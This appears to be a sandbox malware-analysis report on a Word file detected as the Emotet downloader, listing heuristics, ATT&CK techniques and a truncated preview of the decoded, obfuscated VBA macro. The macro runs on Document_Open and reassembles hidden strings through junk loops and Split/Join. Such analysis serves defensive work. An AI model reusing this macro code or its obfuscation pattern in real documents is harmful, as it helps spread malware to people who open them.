MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample contains a VBA macro that is automatically executed upon opening the document, as indicated by the Document_Open macro and GetObject call heuristics. ClamAV detection explicitly identifies this as Emotet, a known downloader. The VBA code, though obfuscated, likely facilitates the download and execution of a secondary payload, consistent with Emotet's behavior.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-7543223-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7543223-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11371 bytes |
SHA-256: 4b89f6cf6e92d499756108fe403b382041891ca8830bd483d3b0b932102cd3e1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Zjnihuyd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Rnmzapoebrzf
End Sub
Attribute VB_Name = "Xhskqoai"
Attribute VB_Base = "0{4C1114CC-CCAD-4819-8BDA-F0B0B3E20163}{95DA1639-C0C5-42E9-B6A6-1BE9A9550CD8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Bzhdksxaqsqec"
Function Ojjuqsjefq()
Do While Tllmtfcvwo = 900
Do While Bafpxose = 3 + 2
Urfajnnpofs = Chr(4)
Ecyjrownsybeb = Sqr(9) + Xgubgfqthswph
Jkfabmyfbpiab = CLng(Vhwrsilq)
Njrquzpgsoqz = Int(1 + 1)
Jyatmyeoadw = CDate(QKoWc)
Qoqytpgndhog = 9 + Int(4)
Loop
Do While Tjemwghhuire = 2 + 4
Yinufgyscqx = CLng(Bfrmmvfkfwrz)
Iuigpypovt = Int(1 + 4)
Kubgnpml = 2 + Int(3)
Cvejmftl = Chr(6)
Xuqytjilemkx = Sqr(7) + Lkjzibnwfh
Bglkvjwzcp = CDate(QKoWc)
Loop
Loop
Abfwawjb = ChrW(wdKeyP)
Do While Lbsvxxuqgpvy = 900
Do While Tlmghpldka = 3 + 2
Bfpztgcxpzczi = Chr(4)
Kgmufkyijc = Sqr(9) + Kiiqsmzwoahv
Cuuimxiebwygd = CLng(Wfwsospg)
Mjcwjzrfih = Int(1 + 1)
Aqdjfhmsljk = CDate(QKoWc)
Vlcaennkyzof = 9 + Int(4)
Loop
Do While Xgbuhyhefoem = 2 + 4
Qzdyjeonofet = CLng(Cqpdxpom)
Dukqfovrgtu = Int(1 + 4)
Pwddjrwqnhdbp = 2 + Int(3)
Prfepovo = Chr(6)
Iajnnxjdtzhtm = Sqr(7) + Nyqngoppubon
Iuijfaqmcz = CDate(QKoWc)
Loop
Loop
Cmyxktysd = Abfwawjb + Xhskqoai.Jvhvaxaeqcz + Xhskqoai.Bhahpqcrjgca
Do While Snkvydgpdkm = 900
Do While Hrlobhzajueh = 3 + 2
Hkcprsfban = Chr(4)
Xmzurfrbh = Sqr(9) + Jkespitfn
Yeauvpofqxmu = CLng(Apczqibqft)
Zqthhoscou = Int(1 + 1)
Kbmbahwpugosq = CDate(QKoWc)
Fshzgpipyljpy = 9 + Int(4)
Loop
Do While Ygvfoovzq = 2 + 4
Pstcaqaqmjgvn = CLng(Moqqsynn)
Xksjktqbj = Int(1 + 4)
Wwltohpxrki = 2 + Int(3)
Chjafycelt = Chr(6)
Ihcqqtdhm = Sqr(7) + Fwdqxpqxomfg
Pwlxklchng = CDate(QKoWc)
Loop
Loop
Fack = Xhskqoai.Bdocprwabpp.Tag
Wcsoqfpvhikng = Split(Cmyxktysd + LTrim(LTrim(Fack)), "9_msnnj883hn///")
Do While Glbodoqfmkfot = 900
Do While Holymhlqyqomz = 3 + 2
Povgubymqw = Chr(4)
Wnbhlbvzqffm = Sqr(9) + Udxpcrrzuqsn
Jbucuoocwjcke = CLng(Kiiqzgvobuzbw)
Oygxqokdra = Int(1 + 1)
Homrncckhkww = CDate(QKoWc)
Msivnrjkuee = 9 + Int(4)
Loop
Do While Izfqpsnnapcly = 2 + 4
Ddckhccrv = CLng(Ojwuinhdukc)
Dcamdfjox = Int(1 + 4)
Qbuywgikt = 2 + Int(3)
Erfgoevz = Chr(6)
Kvhebpnp = Sqr(7) + Rhpdgtigocrze
Jgwretydgggnt = CDate(QKoWc)
Loop
Loop
Ojjuqsjefq = Vddmpvdcpsif + Join(Wcsoqfpvhikng, "") + Vddmpvdcpsif
Do While Zafwmamb = 900
Do While Qezucrioy = 3 + 2
Bbaujfxjg = Chr(4)
Ivywpwgf = Sqr(9) + Euwinwoexwg
Xyebduosvqnw = CLng(Gcmhtitwhemvi)
Ivwkabxlu = Int(1 + 1)
Zvjejmjahc = CDate(QKoWc)
Npaaraphlfn = 9 + Int(4)
Loop
Do While Qlduirreijxn = 2 + 4
Zmibbwgjuzag = CLng(Vythwjtaf)
Ltjegcmofqvdd = Int(1 + 4)
Ngqdtbgnjjp = 2 + Int(3)
Sbygbbqdweox = Chr(6)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.